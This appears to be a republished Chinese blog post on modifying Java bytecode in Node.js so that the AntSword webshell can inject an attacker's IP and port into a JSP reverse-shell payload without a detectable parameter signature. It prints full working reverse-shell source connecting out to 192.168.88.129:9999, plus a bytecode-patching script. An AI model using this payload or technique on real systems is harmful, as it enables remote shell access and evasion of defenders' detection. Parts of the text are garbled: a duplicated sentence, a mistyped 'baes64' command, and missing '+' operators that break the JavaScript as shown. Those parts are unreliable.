无java环境修改字节码

2020-12-23 10:17:58 浏览数 (1)

原文链接:https://yzddmr6.tk/posts/node-edit-java-class/

需 求

在蚁剑改造计划之实现JSP一句话中,当时为了解决硬编码字节码的问题采用了额外参数的方式来传参。但是同时带来的问题就是键名的固定跟额外带来的编码问题,很容易成为一个特征。

例如

代码语言:javascript复制
POST:   ant=xxxxxxxxxxxxxxx&var1=/bin/bash&var2=whoami

蚁剑没有java环境,所以没办法像冰蝎一样调用asm框架来修改字节码。但是我们也不需要asm框架那么强大的功能,实际上只需要修改其中的一个字符串的值就可以了,那么怎么实现呢?这个要从字节码的结构说起。

Java字节码结构

这里以As_Exploits中的jsp反弹shell的payload为例

代码语言:javascript复制
import java.io.*;
import java.net.Socket;

public class ShellReverseTCP extends Thread {

    InputStream zj;
    OutputStream sd;
    public static String ip;
    public static String port;

    ShellReverseTCP(InputStream zj, OutputStream sd) {
        this.zj = zj;
        this.sd = sd;
    }

    public ShellReverseTCP() {

    }
    @Override
    public boolean equals(Object obj){
        ip="targetIP";
        port="targetPORT";
        try {
            RunShellReverseTCP();
            return true;
        }catch (Exception e){
            return false;
        }

    }

    public static void main(String[] args) {
        ip="192.168.88.129";
        port="9999";
        ShellReverseTCP shellReverseTCP = new ShellReverseTCP();
        shellReverseTCP.RunShellReverseTCP();
    }

    public void RunShellReverseTCP() {
        try {
            String ShellPath;
            if (System.getProperty("os.name").toLowerCase().indexOf("windows") == -1) {
                ShellPath = new String("/bin/sh");
            } else {
                ShellPath = new String("cmd.exe");
            }

            Socket socket = new Socket(ip, Integer.parseInt(port));
            Process process = Runtime.getRuntime().exec(ShellPath);
            (new ShellReverseTCP(process.getInputStream(), socket.getOutputStream())).start();
            (new ShellReverseTCP(socket.getInputStream(), process.getOutputStream())).start();
        } catch (Exception e) {
        }
    }


    public void run() {
        BufferedReader yx = null;
        BufferedWriter jah = null;
        try {
            yx = new BufferedReader(new InputStreamReader(this.zj));
            jah = new BufferedWriter(new OutputStreamWriter(this.sd));
            char buffer[] = new char[8192];
            int length;
            while ((length = yx.read(buffer, 0, buffer.length)) > 0) {
                jah.write(buffer, 0, length);
                jah.flush();
            }
        } catch (Exception e) {
        }
        try {
            if (yx != null)
                yx.close();
            if (jah != null)
                jah.close();
        } catch (Exception e) {
        }
    }
}

main函数是调试用的不用管,入口是equals函数,我们的目的就是把其中的targetIP跟targetPORT替换为我们的目标IP跟端口。

用010editor打开编译后的字节码文件查看。

最开始的CAFEBA最开始的CAFEBABE叫做魔数,用来标志这是一个字节码文件。BE叫做魔数,用来标志这是一个字节码文件。

00 00 00 34是版本号,0x34转为10进制是52,查表知是jdk1.8。

后面还有import的相关类的信息,因为不是重点,这里不再过多说明,快进到常量池。

常量池中的每一项都是一个表,其项目类型共有14种,如下表格所示:

这14种类型的结构各不相同,如下表格所示:

代码语言:javascript复制
注:上面的表格的单位是错的,应该是byte不是bit,不知道哪里的以讹传讹一直流传了下来。

从上面的表格可以看到,虽然每一项的结构都各不相同,但是他们有个共同点,就是每一项的第一个字节都是一个标志位,标识这一项是哪种类型的常量。

我们关注的应该是CONSTANT_utf8_info跟CONSTANT_String_info。如果变量是第一次被定义的时候是用CONSTANT_utf8_info标志,第二次使用的时候就变成了CONSTANT_String_info,即只需要tag跟面向字符串的索引。

也就是说关键的结构就是这个

其实跟PHP的序列化很相似,首先来个标志位表示变量的类型,然后是变量的长度,最后是变量的内容。

结合文件来看

targetIP共占了8个byte,也就是16个hex的位。所以前面两个byte是00 08。然后再之前的一个byte是01,表示这是一个CONSTANT_utf8_info。

如 何 修 改

既然知道了其结构,那么修改的办法也就呼之欲出。除了修改变量的hex,只需要再把前面的变量长度给改一下就可以了。

把yan表哥的代码抽出来修改一下

代码语言:javascript复制
function replaceClassStringVar(b64code, oldvar, newvar) {
    let code = Buffer.from(b64code, 'base64');//解码
    let hexcode = code.toString('hex');//转为16进制
    let hexoldvar = Buffer.from(oldvar).toString('hex');//转为16进制
    let oldpos = hexcode.indexOf(hexoldvar);
    if (oldpos > -1) {//判断字节码中是否包含目标字符串
      let newlength = decimalToHex(newvar.length, 4);//计算新字符串长度
      let retcode = `${hexcode.slice(0, oldpos - 4)}${newlength}${Buffer.from(newvar).toString('hex')}${hexcode.slice(oldpos   hexoldvar.length)}`;//把原来字节码的前后部分截出来,中间拼上新的长度跟内容
      return Buffer.from(retcode, 'hex').toString('base64');//base64编码
    }
    console.log('nonono')
    return b64code;
  }

  function decimalToHex(d, padding) {
    var hex = Number(d).toString(16);
    padding = typeof (padding) === "undefined" || padding === null ? padding = 2 : padding;
    while (hex.length < padding) {
      hex = "0"   hex;//小于padding长度就填充0
    }
    return hex;
  }

content=`xxxxxxxxxxxxx`//要替换的字节码

content=replaceClassStringVar(content,'targetIP','192.168.88.129')
content=replaceClassStringVar(content,'targetPORT','9999')
console.log(content)

用命令还原一下文件

代码语言:javascript复制
echo -n xxxxxx |baes64 -d |tee after.class

看一下修改后的结果

192.168.88.129总共是14个byte,换成16进制就是0xe,刚好符合。

实际中是否能用呢?

回车,获得会话,说明修改是有效的。

最后

As_Exploits还在开发中,不得不说很麻烦,同一个功能要写asp/aspx/php/jsp四份代码。后端还可以写写,前端是真的要现学,不过还是可以期待一下。

END

0 人点赞